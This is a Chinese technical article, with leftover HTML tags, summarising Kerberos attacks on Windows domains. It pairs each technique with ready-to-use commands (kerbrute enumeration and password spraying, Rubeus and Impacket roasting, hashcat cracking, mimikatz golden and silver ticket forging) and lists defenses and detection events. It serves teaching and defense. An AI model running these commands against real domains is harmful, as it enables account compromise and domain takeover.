Kerberos协议攻击面总结(一) 技术文档<\/h3>

目录<\/h4>

用户名枚举<\/strong><\/li>
Password Spraying<\/strong><\/li>
AS-REP Roasting<\/strong><\/li>
CVE-2022-33679<\/strong><\/li>
Kerberos Roasting<\/strong><\/li>
无预身份认证的Kerberos Roasting<\/strong><\/li>
Targeted Kerberoasting<\/strong><\/li>
MS14-068 & CVE-2014-6324<\/strong><\/li>
黄金票据<\/strong><\/li>

白银票据<\/strong><\/li> <\/ol>

1. 用户名枚举<\/h3>
原理<\/strong>
通过Kerberos协议的KDC（密钥分发中心）返回的错误码差异（如KRB5KDC_ERR_PREAUTH_REQUIRED<\/code>与KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN<\/code>）区分有效与无效用户。工具<\/strong><\/p>
kerbrute<\/code>：.\/kerbrute userenum --dc <域控IP> -d <域名> userlist.txt<\/code> 防御<\/strong> 禁用错误码差异或启用账户锁定策略。<\/li> <\/ul> 2. Password Spraying（密码喷洒）<\/h3> 原理<\/strong> 对多个用户尝试少量通用密码（如Password123<\/code>），避免触发账户锁定。步骤<\/strong><\/p> 收集用户名列表（如LDAP查询）。<\/li> 使用kerbrute<\/code>或Rubeus<\/code>喷洒密码： .\/kerbrute passwordspray -d <域名> userlist.txt <密码> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 防御<\/strong> 启用多因素认证（MFA）和复杂密码策略。<\/p> 3. AS-REP Roasting<\/h3> 前提<\/strong> 目标用户未启用预身份认证（DONT_REQ_PREAUTH<\/code>属性）。攻击流程<\/strong><\/p> 枚举此类用户： Get-DomainUser -PreauthNotRequired | Select-Object samaccountname <\/span><\/span><\/code><\/pre><\/li> 请求AS-REP响应并提取加密的TGT： Rubeus.exe asreproast \/user:<用户名> \/nowrap <\/span><\/span><\/code><\/pre><\/li> 离线破解（如hashcat -m 18200 hash.txt rockyou.txt<\/code>）。防御<\/strong> 对所有用户启用预身份认证。<\/li> <\/ol> 4. CVE-2022-33679（Kerberos EoP漏洞）<\/h3> 影响<\/strong> Windows Kerberos客户端特权提升（需中间人位置）。利用条件<\/strong><\/p> 攻击者需伪造KDC响应。<\/li> 修补前需禁用RC4加密（补丁KB5016693）。<\/li> <\/ul> 5. Kerberos Roasting<\/h3> 原理<\/strong> 通过服务账号的TGS请求获取加密的ST（服务票据），离线破解服务密码。工具<\/strong><\/p> Rubeus<\/code>： Rubeus.exe kerberoast \/outfile:<\/span>hashes.txt <\/span><\/span><\/code><\/pre><\/li> Impacket<\/code>： GetUserSPNs.py -dc-ip <域控IP> <域名>\/<用户> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 防御<\/strong> 使用强服务账户密码（如随机128位）。<\/p> 6. 无预身份认证的Kerberos Roasting<\/h3> 扩展场景<\/strong> 结合AS-REP Roasting与Kerberoasting，针对未启用预认证的服务账户。<\/p> 7. Targeted Kerberoasting<\/h3> 原理<\/strong> 针对高权限服务账户（如域管理员关联的SPN）发起定向攻击。步骤<\/strong><\/p> 查询高价值SPN： Get-DomainUser -SPN | Where-Object { $_.memberof -match<\/span> "Domain Admins"<\/span> } <\/span><\/span><\/code><\/pre><\/li> 请求其ST并破解。<\/li> <\/ol> 8. MS14-068 & CVE-2014-6324（PAC漏洞）<\/h3> 原理<\/strong> 伪造PAC（特权属性证书）生成高权限TGT。工具<\/strong><\/p> PyKEK<\/code>：生成伪造的TGT。修复<\/strong> 安装MS14-068补丁并启用PAC签名验证。<\/li> <\/ul> 9. 黄金票据（Golden Ticket）<\/h3> 前提<\/strong> 获取krbtgt<\/code>账户的NTLM哈希。生成<\/strong><\/p> mimikatz.exe "kerberos::golden \/user:fakeuser \/domain:<域名> \/sid:<域SID> \/krbtgt:<哈希> \/ptt"<\/span> <\/span><\/span><\/code><\/pre>持久性<\/strong> 票据有效期默认10年（需定期更新krbtgt密码）。<\/p> 10. 白银票据（Silver Ticket）<\/h3> 原理<\/strong> 伪造特定服务的ST（无需TGT），需服务账户密码哈希。生成<\/strong><\/p> mimikatz.exe "kerberos::golden \/user:fakeuser \/domain:<域名> \/sid:<域SID> \/target:<服务主机> \/service:<服务类型> \/rc4:<服务哈希> \/ptt"<\/span> <\/span><\/span><\/code><\/pre>限制<\/strong> 仅对特定服务有效（如CIFS<\/code>、HTTP<\/code>）。<\/p> 防御总结<\/h3> 通用措施<\/strong>：启用强预认证、禁用RC4、定期轮换密钥。<\/li> 检测<\/strong>：监控异常Kerberos请求（如大量AS-REQ失败）。<\/li> 权限控制<\/strong>：限制服务账户权限，启用LSA保护。<\/li> <\/ul> 工具链<\/strong><\/p> 攻击：Kerbrute, Rubeus, Mimikatz, Impacket.<\/li> 防御：Windows Event ID 4768\/4769, Sysmon, ELK.<\/li> <\/ul> （完）<\/p>